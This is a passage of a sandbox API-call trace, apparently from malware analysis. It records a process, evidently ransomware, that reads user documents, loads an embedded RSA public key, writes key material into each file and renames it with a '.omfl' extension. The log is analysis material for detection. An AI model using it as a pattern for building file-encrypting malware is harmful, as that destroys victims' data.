lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0132.335] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.335] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xb8f, lpOverlapped=0x0) returned 1 [0132.335] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.335] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0132.335] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.335] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.335] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0132.336] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0132.336] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0132.336] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0132.336] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0132.336] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0132.336] GetLastError () returned 0x0 [0132.336] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0132.336] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0132.336] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.336] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0132.336] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0132.336] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.336] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0132.336] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.336] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.336] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xb90) returned 0xdd29950 [0132.336] SetFilePointer (in: hFile=0x610, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0132.337] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dba78 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd173a0 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dbac0 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd173b8 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd173e8 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17400 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0132.337] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0132.337] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173e8 | out: hHeap=0x4970000) returned 1 [0132.337] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17400 | out: hHeap=0x4970000) returned 1 [0132.337] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.337] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0132.337] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17400 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd173e8 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdbc8 [0132.337] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0132.337] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.337] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17400 | out: hHeap=0x4970000) returned 1 [0132.337] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.337] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173e8 | out: hHeap=0x4970000) returned 1 [0132.338] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0132.338] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.338] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.338] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.338] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0132.338] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.338] GetCurrentThreadId () returned 0x618 [0132.338] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0132.338] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x75798c0 [0132.338] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0132.338] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0132.338] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0132.338] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.338] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0132.338] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0132.338] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.338] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.338] GetCurrentThreadId () returned 0x618 [0132.338] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.338] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.338] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0132.338] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.338] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.338] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.338] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.338] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.338] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0132.338] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.338] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c4e0 [0132.338] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.338] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0132.339] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xb8f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.339] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0132.339] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0132.339] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0132.339] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0132.339] CloseHandle (hObject=0x610) returned 1 [0132.341] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\GqqvBqOHVEd.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tlpir\\gqqvbqohved.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\GqqvBqOHVEd.ppt.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tlpir\\gqqvbqohved.ppt.omfl")) returned 1 [0132.342] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.342] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.342] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.344] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0132.344] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b18aba0, ftCreationTime.dwHighDateTime=0x1d5d967, ftLastAccessTime.dwLowDateTime=0xda6ab5c0, ftLastAccessTime.dwHighDateTime=0x1d5d899, ftLastWriteTime.dwLowDateTime=0xda6ab5c0, ftLastWriteTime.dwHighDateTime=0x1d5d899, nFileSizeHigh=0x0, nFileSizeLow=0x6930, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IqiGUqs.csv", cAlternateFileName="")) returned 1 [0132.344] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\IqiGUqs.csv") returned=".csv" [0132.344] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\IqiGUqs.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tlpir\\iqiguqs.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0132.345] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=26928) returned 1 [0132.345] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0132.348] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x690a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.348] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0132.349] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x6930, lpOverlapped=0x0) returned 1 [0132.350] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.350] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.350] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.350] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0132.351] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0132.351] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0132.351] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0132.351] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0132.351] GetLastError () returned 0x0 [0132.351] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0132.351] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0132.351] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.351] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0132.351] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0132.351] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0132.352] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.352] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.352] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x6930) returned 0xdd35410 [0132.352] SetFilePointer (in: hFile=0x610, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0132.352] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0132.352] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0132.352] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.352] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0132.352] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0132.352] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dbac0 [0132.352] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd173b8 [0132.352] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dbb08 [0132.352] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd173d0 [0132.352] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17400 [0132.352] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0132.352] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17418 [0132.352] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0132.352] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0132.352] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0132.352] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0132.352] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17400 | out: hHeap=0x4970000) returned 1 [0132.352] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17418 | out: hHeap=0x4970000) returned 1 [0132.353] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0132.353] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0132.353] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0132.353] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0132.353] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e18 [0132.353] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17418 [0132.353] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0132.353] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd17400 [0132.353] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0132.353] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0132.353] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0132.353] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0132.353] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0132.353] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0132.353] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf168 [0132.353] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.353] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.353] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17418 | out: hHeap=0x4970000) returned 1 [0132.353] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.353] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17400 | out: hHeap=0x4970000) returned 1 [0132.353] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0132.353] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.353] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0132.353] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.353] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0132.353] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.353] GetCurrentThreadId () returned 0x618 [0132.353] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0132.353] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x7579950 [0132.353] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.354] HeapFree (in: 